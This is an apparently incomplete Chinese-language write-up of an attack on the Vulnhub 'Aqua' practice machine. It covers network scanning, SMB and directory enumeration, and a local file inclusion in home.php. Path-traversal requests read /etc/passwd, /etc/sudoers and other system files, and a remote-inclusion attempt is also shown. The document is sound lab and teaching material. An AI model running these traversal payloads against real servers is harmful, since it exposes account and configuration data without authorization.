Vulnhub之Aqua靶机测试过程(部分,只可以读取本地文件)
Aqua
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f3:da:85 1 60 PCS Systemtechnik GmbH
192.168.56.246 08:00:27:bd:32:fa 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.246
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.246 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 06:24 EST
Nmap scan report for bogon (192.168.56.246)
Host is up (0.00010s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Service Info: Host: LINUXLITE
Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: LINUXLITE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-12-01T11:24:32
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: aqua
| NetBIOS computer name: LINUXLITE\x00
| Domain name: \x00
| FQDN: aqua
|_ System time: 2022-12-01T19:24:32+08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds
NMAP扫描结果表明目标主机有3个开放端口80(HTTP)、139与445(SMB)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient -L 192.168.56.246
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
liteshare Disk
IPC$ IPC IPC Service (Linux Lite Shares)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LINUXLITE
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient //192.168.56.246/liteshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ curl http://192.168.56.246
<html>
<head>
<link rel="shortcut icon" href="data:;base64,=">
</head>
<body>
<div align="center">
<img src="./images/locked.gif" alt="locked" style="display:block;margin: 0 auto;">
<p style="max-width: 75ch;border:3px;border-style:solid;border-color:black; padding:1em" align="justify"><strong>Help me! My computer has been hacked by Megumin and I have lost access to my computer password! If you help me, I'll tell everything about Megumin so you can help me to hack her back. Please?? ...</strong></p>
<input type="submit" id="yes" name="yes" value="Sure, I'll help">
<input type="submit" id="no" name="no" value="Nope, I'll pass">
<script type="text/javascript">
document.getElementById("yes").onclick = function(){
location.href = "yes.html"
};
document.getElementById("no").onclick = function(){
location.href = "no.html"
};
</script>
</div>
</body>
</html>
这里返回似乎是用户名:密码,但是什么服务的呢?
─(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient -U megumin //192.168.56.246/liteshare
未能连接,因此排除是smb服务的用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ gobuster dir -u http://192.168.56.246 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.246
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/01 06:30:37 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.246/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.246/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.246/manual/]
/deployment (Status: 301) [Size: 321] [--> http://192.168.56.246/deployment/]
/server-status (Status: 403) [Size: 279]
/meow (Status: 301) [Size: 315] [--> http://192.168.56.246/meow/]
Progress: 214342 / 220561 (97.18%)===============================================================
2022/12/01 06:30:55 Finished
===============================================================
Gobuster工具扫描出来几个目录:
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.246 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.246
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/01 06:39:50 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.246/images/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 927]
/home.php (Status: 302) [Size: 158] [--> login.php]
/login.php (Status: 200) [Size: 1801]
/welcome.php (Status: 200) [Size: 935]
/css (Status: 301) [Size: 314] [--> http://192.168.56.246/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.246/manual/]
/no.html (Status: 200) [Size: 157]
/yes.html (Status: 200) [Size: 272]
/deployment (Status: 301) [Size: 321] [--> http://192.168.56.246/deployment/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/meow (Status: 301) [Size: 315] [--> http://192.168.56.246/meow/]
Progress: 1098274 / 1102805 (99.59%)===============================================================
2022/12/01 06:41:21 Finished
===============================================================
发现了登录页面,用前面访问首页得到的用户名密码,可以成功登录:
从该页面的url看,会不会有本地文件包含:
http://192.168.56.246/home.php?showcase=index.php
验证一下:
http://192.168.56.246/home.php?showcase=../../../../../../etc/passwd
发现可以成功返回:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false ntp:x:109:119::/home/ntp:/bin/false avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false saned:x:118:129::/var/lib/saned:/bin/false usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin aqua:x:1000:1000:aqua,,,:/home/aqua:/bin/bash mysql:x:120:131:MySQL Server,,,:/nonexistent:/bin/false ftp:x:121:132:ftp daemon,,,:/srv/ftp:/bin/false megumin:x:1001:1001:,,,:/var/www/html/deployment:/bin/bash
发现有以下用户:
aqua
megumin
接下来看是否可以远程包含:
http://192.168.56.246/home.php?showcase=http://192.168.56.206:8000/test.txt
发现没有返回。
看是否可以访问access.log
http://192.168.56.246/home.php?showcase=../../../../../../../var/log/apache2/access.log
可以通过本地文件包含获取以下敏感文件:
http://192.168.56.246/home.php?showcase=../../../../../../../etc/sudoers
# # This file MUST be edited with the 'visudo' command as root. # # Please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file. # # See the man page for details on how to write a sudoers file. # Defaults env_reset Defaults mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" # Host alias specification # User alias specification # Cmnd alias specification # User privilege specification root ALL=(ALL:ALL) ALL # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "#include" directives: #includedir /etc/sudoers.d #modified by yunaranyancat aqua ALL=(ALL) NOPASSWD: /root/quotes aqua ALL=(ALL) NOPASSWD: /root/esp aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor
http://192.168.56.246/home.php?showcase=../../../../../../../etc/apache2/sites-enabled/000-default.conf
# The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com ServerAdmin webmaster@localhost DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
http://192.168.56.246/home.php?showcase=../../../../../../../etc/iptables/rules.v4
# Generated by ip6tables-save v1.6.0 on Wed Jan 15 00:08:40 2020 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p tcp -m tcp --dport 21 -j DROP COMMIT # Completed on Wed Jan 15 00:08:40 2020
http://192.168.56.246/home.php?showcase=../../../../../../../etc/logrotate.conf
# see "man logrotate" for details # rotate log files weekly weekly # use the syslog group by default, since this is the owning group # of /var/log/syslog. su root syslog # keep 4 weeks worth of backlogs rotate 4 # create new (empty) log files after rotating old ones create # uncomment this if you want your log files compressed #compress # packages drop log rotation information into this directory include /etc/logrotate.d # no packages own wtmp, or btmp -- we'll rotate them here /var/log/wtmp { missingok monthly create 0664 root utmp rotate 1 } /var/log/btmp { missingok monthly create 0660 root utmp rotate 1 } # system-specific logs may be configured here
总结如下:
DocumentRoot /var/www/html #网站目录
-A INPUT -p tcp -m tcp --dport 21 -j DROP 对21端口拦截 与前面端口扫描结果一致
#modified by yunaranyancat #可以无许root运行的命令
aqua ALL=(ALL) NOPASSWD: /root/quotes
aqua ALL=(ALL) NOPASSWD: /root/esp
aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb
megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor
/var/log/wtmp { #可以判断log目录在var下
missingok
monthly
create 0664 root utmp
rotate 1
}
/var/log/btmp {
missingok
monthly
create 0660 root utmp
rotate 1
}
用WAPPanalyzer插件知道目标主机运行Ubuntu系统,所以/var/log/dpkg.log
STRIVE FOR PROGRESS,NOT FOR PERFECTION
